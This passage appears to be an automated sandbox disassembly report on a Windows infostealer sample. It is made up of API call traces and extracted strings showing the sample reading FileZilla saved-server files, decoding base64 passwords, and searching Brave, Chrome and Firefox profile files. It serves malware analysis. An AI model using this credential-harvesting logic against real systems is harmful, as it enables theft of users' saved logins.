                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D22B5
                                    • lstrlen.KERNEL32(0053D770), ref: 008D22CB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D22FF
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D2313
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2330
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D233C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2362
                                    • lstrlen.KERNEL32(0052B838), ref: 008D2378
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D23A0
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D23AB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D23D6
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D23E8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2407
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D2413
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2438
                                    • lstrlen.KERNEL32(?), ref: 008D244C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2470
                                    • lstrcat.KERNEL32(00000000,?), ref: 008D247E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D24A3
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D24DF
                                    • lstrlen.KERNEL32(0053D118), ref: 008D24EE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D2516
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D2521
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                    • String ID: \*.*
                                    • API String ID: 712834838-1173974218
                                    • Opcode ID: 6b3c1547f4f3dfe93bcf6e421a91fa29f5706fe14904deffe7fbc953ce1a241d
                                    • Instruction ID: 87d2bad28797d6fe360cfafb93bc1b5fc6c2cbcb7ec28eefcf92423ad4b80bdc
                                    • Opcode Fuzzy Hash: 6b3c1547f4f3dfe93bcf6e421a91fa29f5706fe14904deffe7fbc953ce1a241d
                                    • Instruction Fuzzy Hash: 0F62F831911616ABCB21EBA8DC49FAF7BB9FF44700F044229A815D63A1DF34DD16CBA1
                                    APIs
                                    • wsprintfA.USER32 ref: 008D3CDC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 008D3CF3
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008D3D1C
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008D3D36
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D3D6F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D3D97
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D3DA2
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D3DAD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3DCA
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D3DD6
                                    • lstrlen.KERNEL32(?), ref: 008D3DE3
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3E03
                                    • lstrcat.KERNEL32(00000000,?), ref: 008D3E11
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3E3A
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D3E7E
                                    • lstrlen.KERNEL32(?), ref: 008D3E88
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3EB5
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D3EC0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3EE6
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D3EF8
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3F1A
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D3F26
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3F4E
                                    • lstrlen.KERNEL32(?), ref: 008D3F62
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3F82
                                    • lstrcat.KERNEL32(00000000,?), ref: 008D3F90
                                    • lstrlen.KERNEL32(00538F88), ref: 008D3FBB
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D3FE1
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D3FEC
                                    • lstrlen.KERNEL32(00538F38), ref: 008D400E
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4034
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D403F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4067
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D4079
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4098
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D40A4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D40CA
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D40F7
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D4102
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4129
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D413B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D415D
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D4169
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4192
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D41C1
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D41CC
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D41F3
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D4205
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4227
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D4233
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D425C
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D428B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D4296
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D42BD
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D42CF
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D42F1
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D42FD
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4325
                                    • lstrlen.KERNEL32(?), ref: 008D4339
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4359
                                    • lstrcat.KERNEL32(00000000,?), ref: 008D4367
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4390
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D43CF
                                    • lstrlen.KERNEL32(0053D118), ref: 008D43DE
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4406
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D4411
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D443A
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D447E
                                    • lstrcat.KERNEL32(00000000), ref: 008D448B
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008D4689
                                    • FindClose.KERNEL32(00000000), ref: 008D4698
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                    • String ID: %s\*.*
                                    • API String ID: 1006159827-1013718255
                                    • Opcode ID: 6d7fc0e4a7b05cc8a968dae2d7e2ad8055b8a1c9e31515a26fb5e6b49d9f5b05
                                    • Instruction ID: 137b5389b4dccef7e0b758902a9f9ffc0c785058eb021faf1adee89a58df013e
                                    • Opcode Fuzzy Hash: 6d7fc0e4a7b05cc8a968dae2d7e2ad8055b8a1c9e31515a26fb5e6b49d9f5b05
                                    • Instruction Fuzzy Hash: 5F621831911616ABCB25EBA8D849FAF7BB9FF44300F044229B815E7391DB34DD16CB91
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D6E15
                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 008D6E48
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6E82
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6EA9
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D6EB4
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6EDD
                                    • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 008D6EF7
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6F19
                                    • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 008D6F25
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6F50
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D6F80
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 008D6FB5
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D701D
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D704D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 313953988-555421843
                                    • Opcode ID: fc763a38002ddb8e46c4dd20668e19b4640904018bef4756e776db8ef647f050
                                    • Instruction ID: f7890279c43ed6ce7cfba7bd38a34112d45db32463fd3d5368fb4a4240e258dc
                                    • Opcode Fuzzy Hash: fc763a38002ddb8e46c4dd20668e19b4640904018bef4756e776db8ef647f050
                                    • Instruction Fuzzy Hash: 90424871A05616ABCB10ABB8DC49F6F7BB9FF44700F140629B905E6391EF34D906CBA1
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008C602F
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C6082
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C60B5
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C60E5
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C6120
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008C6153
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 008C6163
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$InternetOpen
                                    • String ID: "$------$XS$hS$pS
                                    • API String ID: 2041821634-4215072050
                                    • Opcode ID: ebb27a9754f97a6ee5263a34caac3e74ff319dc4da0b155d36a78af514a3680f
                                    • Instruction ID: c052a64d109c78fa2ea3bae8421da36efd3813b6435db189944d8b902a3286e0
                                    • Opcode Fuzzy Hash: ebb27a9754f97a6ee5263a34caac3e74ff319dc4da0b155d36a78af514a3680f
                                    • Instruction Fuzzy Hash: F852E7719016169BDB20EBB8DC49FAE7BB9FF44300F144128B905E7291EB34ED16CBA1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D701D
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D704D
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D707D
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D70AF
                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 008D70BC
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008D70C3
                                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 008D70DA
                                    • lstrlen.KERNEL32(00000000), ref: 008D70E5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D7128
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D714F
                                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 008D7162
                                    • lstrlen.KERNEL32(00000000), ref: 008D716D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D71B0
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D71D7
                                    • StrStrA.SHLWAPI(00000000,<User>), ref: 008D71EA
                                    • lstrlen.KERNEL32(00000000), ref: 008D71F5
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D7238
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D725F
                                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 008D7272
                                    • lstrlen.KERNEL32(00000000), ref: 008D7281
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D72C9
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D72F1
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008D7314
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 008D7328
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 008D7349
                                    • LocalFree.KERNEL32(00000000), ref: 008D7354
                                    • lstrlen.KERNEL32(?), ref: 008D73EE
                                    • lstrlen.KERNEL32(?), ref: 008D7401
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                    • API String ID: 2641759534-2314656281
                                    • Opcode ID: 7c45aed7477f2fef922a0fd10c526b73de3e2a8c4e5057acc07cb6269e8d8929
                                    • Instruction ID: 26e1ffe664f0b794c8d877d0f7bf5f056de1683bea705528325c3bc0a73d924d
                                    • Opcode Fuzzy Hash: 7c45aed7477f2fef922a0fd10c526b73de3e2a8c4e5057acc07cb6269e8d8929
                                    • Instruction Fuzzy Hash: C6023571A05616AFCB10ABB89C49F6E7BB9FF44700F140629B905E7391EF38D906C7A1
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008CDDC3
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008CDE0E
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008CDE4F
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008CDE7F
                                    • FindFirstFileA.KERNEL32(?,?), ref: 008CDE90
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileFindFirst
                                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                    • API String ID: 157892242-726946144
                                    • Opcode ID: a91249ded5ea8d7b51fd9560af283cb71b0d7678ebb60eeae4770273e5baacbc
                                    • Instruction ID: 5db5857dffff2dc9c2cf0def037e5cfbd5d90e3805fe7b55f24480484ba4087c
                                    • Opcode Fuzzy Hash: a91249ded5ea8d7b51fd9560af283cb71b0d7678ebb60eeae4770273e5baacbc
                                    • Instruction Fuzzy Hash: 23B25C71A012158FCB64DFA9C885FAA7BB4FF44314F18816DE849EB291DB34EC46CB91
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D4F02
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4F2B
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D4F39
                                    • lstrlen.KERNEL32(008F5270), ref: 008D4F44
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4F61
                                    • lstrcat.KERNEL32(00000000,008F5270), ref: 008D4F6D
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D4F9B
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 008D4FB5
                                    Strings
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                    • String ID: prefs.js
                                    • API String ID: 2567437900-3783873740
                                    • Opcode ID: 1f1c96b21b7ee3631108c981cb95974dd5118b91b67f9255b4c60dfe2ae9c9f0
                                    • Instruction ID: c04d80cedabc94085b9a71eb39bec78b05656c57d67501b5cd35d8a1f43a0b1e
                                    • Opcode Fuzzy Hash: 1f1c96b21b7ee3631108c981cb95974dd5118b91b67f9255b4c60dfe2ae9c9f0
                                    • Instruction Fuzzy Hash: 58920970A01A018FDB24DF69D958B6ABBE5FF44714F18826FA849CB3A1DB31DC42CB51
                                    APIs
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D1602
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1625
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D1630
                                    • lstrlen.KERNEL32(008F5270), ref: 008D163B
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1658
                                    • lstrcat.KERNEL32(00000000,008F5270), ref: 008D1664
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D1692
                                    • FindFirstFileA.KERNEL32(00000000,?), ref: 008D16AC
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008D16CB
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008D16E3
                                    • lstrcpy.KERNEL32(00000000,008ED014), ref: 008D1720
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1749
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008D1754
                                    • lstrlen.KERNEL32(008F1D5C), ref: 008D175F
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D177C
                                    • lstrcat.KERNEL32(00000000,008F1D5C), ref: 008D1788
                                    • lstrlen.KERNEL32(?), ref: 008D1793
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D17B5
                                    • lstrcat.KERNEL32(00000000,?), ref: 008D17C1
                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 008D17EE
                                    • StrCmpCA.SHLWAPI(?,0053CF68), ref: 008D1815
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1856
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D187F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D18B3
                                    • StrCmpCA.SHLWAPI(?,0053D970), ref: 008D18CE
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D190F
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1938
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D196C
                                    • StrCmpCA.SHLWAPI(?,0053CF50), ref: 008D1988
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D19B9
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D19E2
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1A0B
                                    • StrCmpCA.SHLWAPI(?,0053D190), ref: 008D1A37
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1A78
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1AA1
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1AD5
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1B24
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1B58
                                    • lstrcpy.KERNEL32(00000000,?), ref: 008D1B93
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 008D1BBB
                                    • FindClose.KERNEL32(00000000), ref: 008D1BCA
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 1346933759-0
                                    • Opcode ID: f2f2574c6084eec1b331e9b8da9be98d8f117cfa2154264d67659848109d4a61
                                    • Instruction ID: 69f19fc76597078acf1692319da48b721a7eefc05a287b3e4de1fa27a67d03c6
                                    • Opcode Fuzzy Hash: f2f2574c6084eec1b331e9b8da9be98d8f117cfa2154264d67659848109d4a61
                                    • Instruction Fuzzy Hash: 7B121871601706ABDB24EFB8D899A6B7BB8FF44340F044A2DB895D7390DB34D815CB92
                                    APIs
                                    • wsprintfA.USER32 ref: 008DCCFC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 008DCD13
                                    • lstrcat.KERNEL32(?,?), ref: 008DCD5F
                                    • StrCmpCA.SHLWAPI(?,008F1D68), ref: 008DCD71
                                    • StrCmpCA.SHLWAPI(?,008F1D6C), ref: 008DCD8B
                                    • wsprintfA.USER32 ref: 008DCDB0
                                    • PathMatchSpecA.SHLWAPI(?,00538F68), ref: 008DCDE2
                                    • CoInitialize.OLE32(00000000), ref: 008DCDEE
                                      • Part of subcall function 008DCBE0: CoCreateInstance.COMBASE(008EB140,00000000,00000001,008EB130,?), ref: 008DCC06
                                      • Part of subcall function 008DCBE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 008DCC46
                                      • Part of subcall function 008DCBE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 008DCCC9
                                    • CoUninitialize.COMBASE ref: 008DCE09
                                    • lstrcat.KERNEL32(?,?), ref: 008DCE2E
                                    • lstrlen.KERNEL32(?), ref: 008DCE3B
                                    • StrCmpCA.SHLWAPI(?,008ED014), ref: 008DCE55
                                    • wsprintfA.USER32 ref: 008DCE7D
                                    • wsprintfA.USER32 ref: 008DCE9C
                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 008DCEB0
                                    • wsprintfA.USER32 ref: 008DCED8
                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008DCEF1
                                    • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 008DCF10
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 008DCF28
                                    • CloseHandle.KERNEL32(00000000), ref: 008DCF33
